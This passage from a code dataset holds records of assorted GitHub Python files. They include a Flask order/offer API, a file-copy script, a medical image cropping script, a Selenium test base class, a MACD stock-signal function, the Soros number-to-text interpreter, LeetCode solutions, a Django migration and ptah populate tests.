'GET':\n temp_table = {}\n temp_table['Order_id'] = all_orders.id\n temp_table['Order_name'] = all_orders.name\n temp_table['Customer_name'] = ''\n temp_table['executor_name'] = ''\n if all_orders.customer:\n temp_table['Customer_name'] = all_orders.customer.first_name\n if all_orders.executor:\n temp_table['executor_name'] = all_orders.executor.first_name\n return jsonify(temp_table)\n\n\n@app.route('/offers/', methods=['GET', 'POST'])\ndef offers():\n if request.method == 'POST':\n data = request.json\n all_offers = db.session.query(Offer).all()\n all_offers_id = []\n for order_ in all_offers:\n all_offers_id.append(order_.id)\n if data.get('id') not in all_offers_id:\n\n new_offer = Offers(id=data.get('id'),\n order_id=data.get('order_id'),\n executor_id=data.get('executor_id'))\n db.session.add(new_offer)\n db.session.commit()\n db.session.close()\n return f\"Offer {data.get('id')} created\"\n else:\n return f\"Offer with id {data.get('id')} already exists\"\n elif request.method == 'GET':\n all_offers = db.session.query(Offer.id, Offer.order_id, Offer.executor_id,\n Order.name).\\\n join(Order, and_(Offer.order_id == Order.id)).all()\n all_offers_list = []\n for offer_ in all_offers:\n temp_dict = {}\n temp_dict['id'] = offer_.id\n temp_dict['order_id'] = offer_.order_id\n temp_dict['executor_id'] = offer_.executor_id\n temp_dict['name'] = offer_.name\n all_offers_list.append(temp_dict)\n return jsonify(all_offers_list)\n return 'Unknown type request'\n\n\n@app.route('/offers/<int:uid>', methods=['GET', 'PUT', 'DELETE'])\ndef offers_id(uid):\n all_offers = db.session.query(Offer).filter(Offer.id == uid).first()\n if all_offers:\n if request.method == 'GET':\n offer_ = Offer.query.get(uid)\n temp_dict = {}\n temp_dict['id'] = offer_.id\n temp_dict['order_id'] = offer_.order_id\n if all_offers.user:\n temp_dict['executor_name'] = all_offers.user.first_name\n temp_dict['executor_id'] = offer_.executor_id\n return jsonify(temp_dict)\n elif request.method == 'DELETE':\n offer_ = Offer.query.get(uid)\n db.session.delete(offer_)\n db.session.commit()\n db.session.close()\n return f'Item {uid} removed from DB'\n elif request.method == 'PUT':\n item_put = Offer.query.get(uid)\n new_data = request.json\n\n item_put.id = new_data.get('id')\n item_put.order_id = new_data.get('order_id')\n item_put.executor_id = new_data.get('executor_id')\n\n db.session.add(item_put)\n db.session.commit()\n db.session.close()\n return f'Item {uid} changed'\n return 'Not found'\n\nif __name__ == '__main__':\n init_db()\n app.run(host='0.0.0.0', port=8080, debug=True)","repo_name":"dos1985/lesson16_HW","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19754973971","text":"import os\r\nimport shutil\r\n\r\ncaminho_original = 'Office\\Desktop\\media_total\\media2'\r\ncaminho_novo = 'Office\\Desktop\\media_total\\medias'\r\n\r\ntry:\r\n os.mkdir(caminho_novo)\r\nexcept FileExistsError as e:\r\n print(f'Pasta {caminho_novo} já existe!')\r\n\r\nfor root, dirs, files in os.walk(caminho_original):\r\n for file in files:\r\n old_file_path = os.path.join(root, file)\r\n new_file_path = os.path.join(caminho_novo, file)\r\n\r\n if 'txt' in file:\r\n shutil.copy(old_file_path, new_file_path)\r\n print(f'Arquivo {file} copiado com sucesso!')\r\n\r\n\r\n","repo_name":"renatamoon/python_classes_poo","sub_path":"python_134_MoverCopiarApagar.py","file_name":"python_134_MoverCopiarApagar.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37186295147","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 1 17:14:27 2018\n\n@author: Josefine\n\"\"\"\n\nimport numpy as np\nimport re\nimport nibabel as nib\nimport glob\nfrom skimage.transform import resize\n\ndef natural_sort(l): \n convert = lambda text: int(text) if text.isdigit() else text.lower() \n alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ] \n return sorted(l, key = alphanum_key)\n\n# Create original high res data function:\ndef create_data(filename_img):\n a = nib.load(filename_img)\n a = a.get_data()\n a2 = np.clip(a,-1000,1000)\n a3 = np.interp(a2, (a2.min(), a2.max()), (-1, +1))\n # Reshape:\n img = np.zeros([512,512,512])+np.min(a3)\n index1 = int(np.ceil((512-a.shape[2])/2))\n index2 = int(512-np.floor((512-a.shape[2])/2))\n img[:,:,index1:index2] = a3\n images = img.transpose((2,0,1))\n return images\n\ndef create_label(filename_label):\n # Label creation\n b = nib.load(filename_label)\n b = b.get_data()\n img = np.zeros([b.shape[0],b.shape[0],b.shape[0]])\n index1 = int(np.ceil((img.shape[2]-b.shape[2])/2))\n index2 = int(img.shape[2]-np.floor((img.shape[2]-b.shape[2])/2))\n img[:,:,index1:index2] = b\n labels = img.transpose((2,0,1))\n return labels\n\n# Fusion of low resolution probablity maps\ndef fusion(prob_maps_axial, prob_maps_sag, prob_maps_cor):\n # Reshape sagittal data to match axial:\n sag_to_axial = prob_maps_sag.transpose((2, 0, 1, 3))\n # Reshape coronal data to match axial:\n cor_to_sag = prob_maps_cor.transpose((1, 0, 2, 3))\n cor_to_axial = cor_to_sag.transpose((2, 0, 1, 3))\n temp = np.maximum.reduce([sag_to_axial,cor_to_axial,prob_maps_axial])\n return temp\n\n# Region retraction\ndef cut_region(volumen1):\n for i in range(volumen1.shape[0]):\n if np.max(volumen1[i,:,:]) == 1:\n break \n \n for j in range(volumen1.shape[1]):\n if np.max(volumen1[:,j,:]) == 1:\n break \n \n for k in range(volumen1.shape[2]):\n if np.max(volumen1[:,:,k]) == 1:\n break\n \n for i2 in reversed(range(volumen1.shape[0])):\n if np.max(volumen1[i2,:,:]) == 1:\n break \n \n for j2 in reversed(range(volumen1.shape[1])):\n if np.max(volumen1[:,j2,:]) == 1:\n break \n \n for k2 in reversed(range(volumen1.shape[2])):\n if np.max(volumen1[:,:,k2]) == 1:\n break \n #factor = int(np.ceil(0.02*volumen1.shape[0]))\n #cut_volumen = volumen1[i-factor:i2+factor,j-factor:j2+factor,k-factor:k2+factor]\n return i,i2,j,j2,k,k2\n\n# Load data:\nfilelist_test = natural_sort(glob.glob('WHS/ct_train_test/ct_test/*_image.nii.gz')) # list of file names\n\nfilelist_train = natural_sort(glob.glob('WHS/Augment_data/*_image.nii')) # list of file names\nfilelist_train_label = natural_sort(glob.glob('WHS/Augment_data/*_label.nii')) # list of file names\n\n# Load test data:\nfiles_p0_axial = natural_sort(glob.glob('WHS/Results/Predictions/region/test_prob_maps_axial_*.npz')) # list of file names\nfiles_p0_sag = natural_sort(glob.glob('WHS/Results/Predictions/region/test_prob_maps_sag_*.npz')) # list of file names\nfiles_p0_cor = natural_sort(glob.glob('WHS/Results/Predictions/region/test_prob_maps_cor_*.npz')) # list of file names\n\n## Load train data:\nfiles_p1_axial = natural_sort(glob.glob('WHS/Results/Predictions/region/train_prob_maps_axial_*.npz')) # list of file names\nfiles_p1_sag = natural_sort(glob.glob('WHS/Results/Predictions/region/train_prob_maps_sag_*.npz')) # list of file names\nfiles_p1_cor = natural_sort(glob.glob('WHS/Results/Predictions/region/train_prob_maps_cor_*.npz')) # list of file names\n\n#for n in range(len(files_p0_axial)):\n# axial_data = np.load(files_p0_axial[n])\n# prob_maps_axial = axial_data['prob_maps']\n# sag_data = np.load(files_p0_sag[n])\n# prob_maps_sag = sag_data['prob_maps']\n# cor_data = np.load(files_p0_cor[n])\n# prob_maps_cor = cor_data['prob_maps']\n#\n# # Create fused propability map\n# fused_prob_maps = fusion(prob_maps_axial, prob_maps_sag, prob_maps_cor)\n# full_prob_maps = np.zeros([512,512,512,2])\n# for i in range(2):\n# full_prob_maps[:,:,:,i] = resize(fused_prob_maps[:,:,:,i],(512,512,512)) \n# label = full_prob_maps.argmax(axis=-1)\n# image = create_data(filelist_test[n])\n#\n# # Get bounding box\n# i,i2,j,j2,k,k2 = cut_region(label)\n# # Load original data\n# factor =int(np.ceil(0.02*image.shape[0]))\n# start = int(np.floor(np.min([i,j,k])-factor))\n# end = int(np.ceil(np.max([i2,j2,k2])+factor))\n# cut = [start,end]\n# if cut[0] < 0:\n# cut[0] = 0\n# if cut[1] > image.shape[0]:\n# cut[1] = image.shape[0]\n# # Crop bounding box of original data\n# cut_img = image[cut[0]:cut[1],cut[0]:cut[1],cut[0]:cut[1]]\n# np.savez('WHS/Data/test_segments_{}'.format(n),images=cut_img,cut=cut)\n# print('Test image', (n+1), 'cut', (cut))\n\nfor n in range(len(files_p1_axial)):\n axial_data = np.load(files_p1_axial[n])\n prob_maps_axial = axial_data['prob_maps']\n sag_data = np.load(files_p1_sag[n])\n prob_maps_sag = sag_data['prob_maps']\n cor_data = np.load(files_p1_cor[n])\n prob_maps_cor = cor_data['prob_maps']\n\n # Create fused propability map\n fused_prob_maps = fusion(prob_maps_axial, prob_maps_sag, prob_maps_cor)\n labels = fused_prob_maps.argmax(axis=-1)\n image = create_data(filelist_train[n])\n groundtruth = create_label(filelist_train_label[n])\n # Get bounding box\n i,i2,j,j2,k,k2 = cut_region(labels)\n\n # Load original data\n factor =int(np.ceil(0.02*groundtruth.shape[0]))\n mult_factor = image.shape[0]/labels.shape[0]\n start = int(np.floor(np.min([i,j,k])*mult_factor-factor))\n end = int(np.ceil(np.max([i2,j2,k2])*mult_factor+factor))\n cut = [start,end]\n if cut[0] < 0:\n cut[0] = 0\n if cut[1] > image.shape[0]:\n cut[1] = image.shape[0]\n # Crop bounding box of original data\n cut_GT = groundtruth[cut[0]:cut[1],cut[0]:cut[1],cut[0]:cut[1]]\n cut_GT = np.round(cut_GT)\n cut_img = image[cut[0]:cut[1],cut[0]:cut[1],cut[0]:cut[1]]\n np.savez('WHS/Data/train_segments_{}'.format(n),images=cut_img,labels=cut_GT,cut=cut)\n print('Train image', (n+1), 'cut', (cut))\n","repo_name":"honorifica/whole-heart-segmentation-1","sub_path":"Region/region_crop.py","file_name":"region_crop.py","file_ext":"py","file_size_in_byte":6257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"23027095416","text":"from selenium import webdriver\nfrom datetime import date\nimport time, sys\nimport ProjectConstant\n# adding framework to project\nsys.path.insert(0, ProjectConstant.FRAMEWORK_PATH)\nfrom framework.WebDriverFactory.DriverFactory import DriverFactory\nfrom framework.Utils.Logging.LoggingUtils import LoggingUtils\nfrom framework.Utils.DataUtils.ExcelRW import ExcelReader, ExcelWriter\n\nclass BaseTestClass(object):\n def __init__(self):\n self.logger = self.get_logger()\n self.driver = self.start_driver()\n\n\n def get_logger(self):\n log_utils = LoggingUtils()\n today = date.today()\n current_date_time = today.strftime(\"%b-%d-%Y\")\n log_file_name = ProjectConstant.LOG_FILE_NAME + \"_\" + current_date_time + ProjectConstant.LOG_FILE_EXTENTION\n logger = log_utils.get_logger(ProjectConstant.LOG_FILE_PATH, log_file_name)\n self.logger = logger\n return logger\n\n def get_data(self, tc_id, header_name):\n data_reader = ExcelReader()\n self.logger.debug(\"Reading file: %s\"%ProjectConstant.LOGIN_DATA_FILE_PATH)\n data = data_reader.get_data_by_header_and_tc_id(logger=self.logger, file_path=ProjectConstant.LOGIN_DATA_FILE_PATH, \n sheet_name=ProjectConstant.LOGIN_DATA_SHEET_NAME, tc_id=tc_id, header_name=header_name)\n return data\n \n def set_result(self, tc_id, header, tc_result):\n data_writer = ExcelWriter()\n self.logger.debug(\"Writing to file: %s\"%ProjectConstant.LOGIN_DATA_FILE_PATH)\n write = data_writer.set_test_result(logger=self.logger, file_path=ProjectConstant.LOGIN_DATA_FILE_PATH, \n sheet_name=ProjectConstant.LOGIN_DATA_SHEET_NAME, testcase_id=tc_id, header_name=header, result=tc_result)\n return write\n\n def start_driver(self):\n browser = ProjectConstant.BROWSER\n entry_url = ProjectConstant.ENTRY_URL\n self.logger.info(\"Starting WebDriver [%s] on: %s\" %(browser, entry_url))\n driver = DriverFactory.init_driver(self.logger, entry_url, browser)\n self.driver = driver\n return driver\n\n\n def terminate_driver(self, driver):\n self.logger.info('BaseTestClass: terminate driver')\n DriverFactory.close_browser(self.logger, driver)\n","repo_name":"skbaithadiya/pythonframework_v2","sub_path":"project/TestCases/BaseTC.py","file_name":"BaseTC.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13929746750","text":"Sec='TATAMOTORS.NS'\ndef graph_plot(Sec):\n stocksymbols = Sec\n startdate = date(2017,8,4)\n end_date = date.today()\n def getMyPortfolio(stocks = stocksymbols ,start = startdate , end = end_date):\n data = web.get_data_yahoo(stocks , data_source='yahoo' , start = start ,end= end )\n return data\n data = getMyPortfolio(stocksymbols)\n return(data)\n macd = ta.macd(data['Close'])\n data = pd.concat([data, macd], axis=1).reindex(data.index)\n def MACD_Strategy(df, risk):\n MACD_Buy=[]\n MACD_Sell=[]\n position=False\n\n for i in range(0, len(df)):\n if df['MACD_12_26_9'][i] > df['MACDs_12_26_9'][i] :\n MACD_Sell.append(np.nan)\n if position ==False:\n MACD_Buy.append(df['Adj Close'][i])\n position=True\n else:\n MACD_Buy.append(np.nan)\n elif df['MACD_12_26_9'][i] < df['MACDs_12_26_9'][i] :\n MACD_Buy.append(np.nan)\n if position == True:\n MACD_Sell.append(df['Adj Close'][i])\n position=False\n else:\n MACD_Sell.append(np.nan)\n elif position == True and df['Adj Close'][i] < MACD_Buy[-1] * (1 - risk):\n MACD_Sell.append(df[\"Adj Close\"][i])\n MACD_Buy.append(np.nan)\n position = False\n elif position == True and df['Adj Close'][i] < df['Adj Close'][i - 1] * (1 - risk):\n MACD_Sell.append(df[\"Adj Close\"][i])\n MACD_Buy.append(np.nan)\n position = False\n else:\n MACD_Buy.append(np.nan)\n MACD_Sell.append(np.nan)\n\n data['MACD_Buy_Signal_price'] = MACD_Buy\n data['MACD_Sell_Signal_price'] = MACD_Sell\n MACD_strategy = MACD_Strategy(data, 0.025)\n def MACD_color(data):\n MACD_color = []\n for i in range(0, len(data)):\n if data['MACDh_12_26_9'][i] > data['MACDh_12_26_9'][i - 1]:\n MACD_color.append(True)\n else:\n MACD_color.append(False)\n return MACD_color\n\n data['positive'] = MACD_color(data)\n\n # plt.rcParams.update({'font.size': 10})\n # fig, ax1 = plt.subplots(figsize=(14,8))\n # fig.suptitle(stocksymbols[0], fontsize=10, backgroundcolor='blue', color='white')\n # ax1 = plt.subplot2grid((14, 8), (0, 0), rowspan=8, colspan=14)\n # ax2 = plt.subplot2grid((14, 12), (10, 0), rowspan=6, colspan=14)\n # ax1.set_ylabel('Price in ')\n # ax1.plot('Adj Close',data=data, label='Close Price', linewidth=0.5, color='blue')\n # ax1.scatter(data.index, data['MACD_Buy_Signal_price'], color='green', marker='^', alpha=1)\n # ax1.scatter(data.index, data['MACD_Sell_Signal_price'], color='red', marker='v', alpha=1)\n # ax1.legend()\n # ax1.grid()\n # ax1.set_xlabel('Date', fontsize=8)\n\n # ax2.set_ylabel('MACD', fontsize=8)\n # ax2.plot('MACD_12_26_9', data=data, label='MACD', linewidth=0.5, color='blue')\n # ax2.plot('MACDs_12_26_9', data=data, label='signal', linewidth=0.5, color='red')\n # ax2.bar(data.index,'MACDh_12_26_9', data=data, label='Volume', color=data.positive.map({True: 'g', False: 'r'}),width=1,alpha=0.8)\n # ax2.axhline(0, color='black', linewidth=0.5, alpha=0.5)\n # ax2.grid()\n # plt.show()\n data['date'] = pd.to_datetime(data.index,format='%Y%m%d')\n data['year'] = pd.DatetimeIndex(data['date']).year\n data= data.replace(np.nan, 'nan')\ngraph_plot(Sec)\n","repo_name":"ramyav23/Stock-Portfolio-Management-","sub_path":"Ramya_Venkatesh/Project/server/Sec='TATAMOTORS.NS'.py","file_name":"Sec='TATAMOTORS.NS'.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20123611572","text":"\"Soros interpreter (see http://numbertext.org)\"\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\nimport re, sys\n\ndef run(program, data, lang):\n return compile(program, lang).run(data)\n\ndef compile(program, lang):\n return _Soros(program, lang)\n\n# conversion function\ndef _tr(text, chars, chars2, delim):\n for i in range(0, len(chars)):\n text = text.replace(delim + chars[i], chars2[i])\n return text\n\n# string literals for metacharacter encoding\n_m = \"\\\\\\\";#$()|[]\"\n_c = u\"\\uE000\\uE001\\uE002\\uE003\\uE004\\uE005\\uE006\\uE007\\uE008\\uE009\" # Unicode private area\n_pipe = u\"\\uE003\"\n# separator prefix = \\uE00A\n\n# pattern to recognize function calls in the replacement string\n_func = re.compile(_tr(r\"\"\"(?:\\|?(?:\\$\\()+)? # optional nested calls\n (\\|?\\$\\(([^\\(\\)]*)\\)\\|?) # inner call (2 subgroups)\n (?:\\uE00A?\\)+\\|?)?\"\"\", # optional nested calls\n _m[4:8], _c[:4], \"\\\\\"), re.X) # \\$, \\(, \\), \\| -> \\uE000..\\uE003\n\nclass _Soros:\n def __init__(self, prg, lang):\n self.lines = []\n if prg.find(\"__numbertext__\") == -1:\n prg = \"__numbertext__;\" + prg\n # default left zero deletion\n # and separator function (no separation, if subcall returns with empty string)\n prg = prg.replace(\"__numbertext__\", u\"\"\"0+(0|[1-9]\\\\d*) $1\n\\\"([a-z][-a-z]* )0+(0|[1-9]\\\\d*)\\\" $(\\\\1\\\\2)\n\\\"\\uE00A(.*)\\uE00A(.+)\\uE00A(.*)\\\" \\\\1\\\\2\\\\3\n\\\"\\uE00A.*\\uE00A\\uE00A.*\\\"\n\"\"\")\n prg = _tr(prg, _m[:4], _c[:4], \"\\\\\") # \\\\, \\\", \\;, \\# -> \\uE000..\\uE003\n # switch off all country-dependent lines, and switch on the requested ones\n prg = re.sub(r\"(^|[\\n;])([^\\n;#]*#[^\\n]*[\\[]:[^\\n:\\]]*:][^\\n]*)\", r\"\\1#\\2\", prg)\n prg = re.sub(r\"(^|[\\n;])#([^\\n;#]*#[^\\n]*[\\[]:\" + lang.replace(\"_\", \"-\") + r\":][^\\n]*)\", r\"\\1\\2\", prg)\n matchline = re.compile(\"^\\s*(\\\"[^\\\"]*\\\"|[^\\s]*)\\s*(.*[^\\s])?\\s*$\")\n prefix = \"\"\n for s in re.sub(\"(#[^\\n]*)?(\\n|$)\", \";\", prg).split(\";\"):\n macro = re.match(\"== *(.*[^ ]?) ==\", s)\n if macro != None:\n prefix = macro.group(1)\n continue\n m = matchline.match(s)\n if prefix != \"\" and s != \"\" and m != None:\n s = m.group(1).strip(\"\\\"\")\n space = \" \" if s != \"\" else \"\"\n caret = \"\"\n if s[0:1] == \"^\":\n s = s[1:]\n caret = \"^\"\n s2 = m.group(2) if m.group(2) != None else \"\"\n s = \"\\\"\" + caret + prefix + space + s + \"\\\" \" + s2\n m = matchline.match(s)\n if m != None:\n s = _tr(m.group(1).strip(\"\\\"\"), _c[1:4], _m[1:4], \"\") \\\n .replace(_c[_m.find(\"\\\\\")], \"\\\\\\\\\") # -> \\\\, \", ;, #\n if m.group(2) != None:\n s2 = m.group(2).strip(\"\\\"\")\n else:\n s2 = \"\"\n s2 = _tr(s2, _m[4:], _c[4:], \"\\\\\") # \\$, \\(, \\), \\|, \\[, \\] -> \\uE004..\\uE009\n # call inner separator: [ ... $1 ... ] -> $(\\uE00A ... \\uE00A$1\\uE00A ... )\n s2 = re.sub(r\"[\\[]\\$(\\d\\d?|\\([^\\)]+\\))\",u\"$(\\uE00A\\uE00A|$\\\\1\\uE00A\", s2)\n s2 = re.sub(r\"[\\[]([^\\$[\\\\]*)\\$(\\d\\d?|\\([^\\)]+\\))\",u\"$(\\uE00A\\\\1\\uE00A$\\\\2\\uE00A\", s2)\n s2 = re.sub(r\"]\",\")\", s2)\n s2 = re.sub(r\"(\\$\\d|\\))\\|\\$\", r\"\\1||$\", s2) # $()|$() -> $()||$()\n s2 = _tr(s2, _c[:4], _m[:4], \"\") # \\uE000..\\uE003-> \\, \", ;, #\n s2 = _tr(s2, _m[4:8], _c[:4], \"\") # $, (, ), | -> \\uE000..\\uE003\n s2 = _tr(s2, _c[4:], _m[4:], \"\") # \\uE004..\\uE009 -> $, (, ), |, [, ]\n s2 = re.sub(r\"\\\\(\\d)\", r\"\\\\g<\\1>\",\n re.sub(r\"\\uE000(\\d)\", \"\\uE000\\uE001\\\\\\\\g<\\\\1>\\uE002\", s2))\n try:\n self.lines = self.lines + [[\n re.compile(\"^\" + s.lstrip(\"^\").rstrip(\"$\") + \"$\"),\n s2, s[:1] == \"^\", s[-1:] == \"$\"]]\n except:\n print(\"Error in following regex line: \" + s, file=sys.stderr)\n raise\n\n def run(self, data):\n return self._run(data, True, True)\n\n def _run(self, data, begin, end):\n for i in self.lines:\n if not ((begin == False and i[2]) or (end == False and i[3])):\n m = i[0].match(data)\n if m:\n try:\n s = m.expand(i[1])\n except:\n print(\"Error for the following input: \" + data, file=sys.stderr)\n raise\n n = _func.search(s)\n while n:\n b = False\n e = False\n if n.group(1)[0:1] == _pipe or n.group()[0:1] == _pipe:\n b = True\n elif n.start() == 0:\n b = begin\n if n.group(1)[-1:] == _pipe or n.group()[-1:] == _pipe:\n e = True\n elif n.end() == len(s):\n e = end\n s = s[:n.start(1)] + self._run(n.group(2), b, e) + s[n.end(1):]\n n = _func.search(s)\n return s\n return \"\"\n","repo_name":"Numbertext/libnumbertext","sub_path":"src/Soros.py","file_name":"Soros.py","file_ext":"py","file_size_in_byte":5355,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"54"} +{"seq_id":"72154247521","text":"class Person(object):\n\n country = \"India\" # class variable\n\n def __init__(self, name_val, age_val, education_val):\n self.person_name = name_val\n self.person_age = age_val\n self.person_edu = education_val\n\n def isPerson(self):\n return True\n\n def get_person_details(self):\n return \"Name : {0} \\nAge : {1}\\nEducation : {2}\".format(self.person_name,\n self.person_age, self.person_edu)\n\nclass Employee(Person):\n\n def __init__(self, name, age, edu, emp_code, emp_department):\n super(Employee, self).__init__(name, age, edu)\n self.employee_code = emp_code\n self.employee_deparment = emp_department\n \n def get_all_details(self):\n person_details = self.get_person_details()\n print(person_details)\n print(\"Employee code is {}\\nDepartment is {}\".format(self.employee_code,\n self.employee_deparment))\n\nif __name__ == \"__main__\":\n\n emp_obj = Employee(\"AAA\", \"12\", \"B.E\", \"1234\", \"Fire\")\n emp_obj.get_all_details()\n print(\"Country is \", Employee.country)\n emp_obj1 = Employee(\"BBB\", \"23\", \"M.E\", \"10101\", \"Accoutant\")\n emp_obj1.get_all_details()\n print(\"Country is \", Employee.country) # accessing class attribute\n","repo_name":"imushir/qxp_python_class_aug_2019","sub_path":"29092019/class/single_heritance_ex_i.py","file_name":"single_heritance_ex_i.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24126748588","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nfrom collections import deque\n\nclass Solution:\n def levelOrder(self, root: Optional[TreeNode]) -> List[List[int]]:\n if not root:\n return []\n self.ret = [[]]\n q = deque([root,0])\n c = 0\n while q:\n n = q.popleft()\n l = q.popleft()\n\n if l != c:\n self.ret.append([])\n c = l\n\n self.ret[c].append(n.val)\n \n if n.left:\n q.append(n.left)\n q.append(l+1)\n if n.right:\n q.append(n.right)\n q.append(l+1)\n \n return self.ret\n","repo_name":"recursean/leetcode-solutions","sub_path":"python/pr102.py","file_name":"pr102.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71892506401","text":"class Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n if not nums:\n return 0\n if len(nums) == 1:\n return 1\n \n for k in range(len(nums)-1, 0, -1):\n if nums[k] == nums[k-1]:\n nums.pop(k)\n \n return len(nums)\n\n#Approach: Two Pointers\n\nclass Solution:\n # @param a list of integers\n # @return an integer\n def removeDuplicates(self, A):\n if not A:\n return 0\n\n newTail = 0\n\n for i in range(1, len(A)):\n if A[i] != A[newTail]:\n newTail += 1\n A[newTail] = A[i]\n\n return newTail + 1\n","repo_name":"ThibautHurson/LeetCode","sub_path":"26-remove_duplicates_from_sorted_array.py","file_name":"26-remove_duplicates_from_sorted_array.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73792632481","text":"import asyncio\nfrom service import TrainerServer, Leader, TrainerClient\nimport sys, getopt\nfrom models import ResNetMNIST, BasicModel\nfrom models.ResNet import ResNetCIFAR10\nfrom rpc import *\nfrom utils import model_to_chunks\n\ndef leader_job():\n pass\n\ndef get_request(model: BasicModel):\n for chunk in model_to_chunks(model):\n yield TrainRequest(model_chunk=chunk)\n\nasync def main(port:int=None, isLeader: bool=False):\n trainer_server = TrainerServer(port)\n await trainer_server.start()\n \n if isLeader:\n # 如果是Leader 就启动Leader的工作\n leader = Leader(ResNetCIFAR10(3000), trainer_server.service, 20)\n await leader.start()\n \n \n \n await trainer_server.blockingUtilShutdown()\n\n\nif __name__ == \"__main__\":\n\n # get port from command line\n port = None\n isLeader = False\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"p:l\", [\"port=\", \"leader=\"])\n for opt, arg in opts:\n if opt in (\"-p\", \"--port\"):\n port = arg\n elif opt in (\"-l\", \"--leader\"):\n isLeader = True\n except getopt.GetoptError:\n print('main.py -p <port>| --port <port>')\n sys.exit(2)\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main(port, isLeader))\n\n","repo_name":"yzzer123/fedavg","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20636594633","text":"def back(choice):\n if len(choice) == 3:\n print(*choice)\n else:\n for i in range(1,6):\n if not used[i]:\n used[i] = 1\n choice.append(i)\n back(choice)\n used[i] = 0\n choice.pop()\n\n\nnumbers = list(range(1, 6))\nused = [0]*6\nback([])","repo_name":"dodonmountain/algorithm","sub_path":"2019_late/adv대비/aa.py","file_name":"aa.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72068120801","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('wedding', '0003_auto_20160128_0149'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='rsvp',\n name='status',\n ),\n migrations.AddField(\n model_name='rsvp',\n name='attending',\n field=models.BooleanField(default=True),\n ),\n migrations.AddField(\n model_name='rsvp',\n name='responded',\n field=models.BooleanField(default=False),\n ),\n ]\n","repo_name":"bpapillon/ben-and-meghan","sub_path":"wedding/migrations/0004_auto_20160128_0216.py","file_name":"0004_auto_20160128_0216.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3869665927","text":"import sqlalchemy as sqla\nimport ptah\nfrom ptah.populate import POPULATE_ID, Populate\nfrom pyramid import testing\nfrom pyramid.exceptions import ConfigurationConflictError\n\n\nclass TestPopulateDirective(ptah.PtahTestCase):\n\n _init_ptah = False\n\n def test_step_registration(self):\n import ptah\n\n @ptah.populate('step', title='Step', requires=['test-dep'])\n def step(registry):\n \"\"\" \"\"\"\n\n self.init_ptah()\n\n data = ptah.get_cfg_storage(POPULATE_ID)\n\n self.assertIn('step', data)\n self.assertIs(data['step']['factory'], step)\n self.assertEqual(data['step']['title'], 'Step')\n self.assertTrue(data['step']['active'])\n self.assertEqual(data['step']['requires'], ['test-dep'])\n\n def test_step_pyramid_registration(self):\n\n def step(registry):\n \"\"\" \"\"\"\n\n config = testing.setUp()\n config.include('ptah')\n config.ptah_populate_step('step', factory=step,\n title='Test', active=False)\n config.commit()\n\n data = config.get_cfg_storage(POPULATE_ID)\n\n self.assertIn('step', data)\n self.assertIs(data['step']['factory'], step)\n self.assertEqual(data['step']['title'], 'Test')\n self.assertFalse(data['step']['active'])\n self.assertEqual(data['step']['requires'], ())\n\n def test_step_registration_conflicts(self):\n import ptah\n\n @ptah.populate('step')\n @ptah.populate('step')\n def step(registry):\n \"\"\" \"\"\"\n\n self.assertRaises(ConfigurationConflictError, self.init_ptah)\n\n\nclass TestPyramidDrective(ptah.PtahTestCase):\n\n def test_directive_execute(self):\n data = [False, False]\n def step1(registry):\n data[0] = True\n\n def step2(registry): # pragma: no cover\n data[0] = True\n\n self.config.ptah_populate_step(\n 'custom-step1', title='Custom step 1',\n active=True, factory=step1)\n\n self.config.ptah_populate_step(\n 'custom-step2', title='Custom step 2',\n active=False, factory=step2)\n\n self.config.ptah_populate()\n\n self.assertTrue(data[0])\n self.assertFalse(data[1])\n\n def test_directive_execute_populate_mode(self):\n data = [False]\n def step(registry): # pragma: no cover\n data[0] = True\n\n self.config.ptah_populate_step(\n 'custom-step', title='Custom step',\n active=True, factory=step)\n\n import ptah\n ptah.POPULATE = True\n\n self.config.ptah_populate()\n\n ptah.POPULATE = False\n\n self.assertFalse(data[0])\n\n\nclass TestListSteps(ptah.PtahTestCase):\n\n def test_list_simple(self):\n def step1(registry):\n \"\"\" \"\"\"\n def step2(registry):\n \"\"\" \"\"\"\n\n self.config.ptah_populate_step(\n 'custom-step1', title='Custom step 1',\n active=True, factory=step1)\n\n self.config.ptah_populate_step(\n 'custom-step2', title='Custom step 2',\n active=False, factory=step2)\n\n steps = 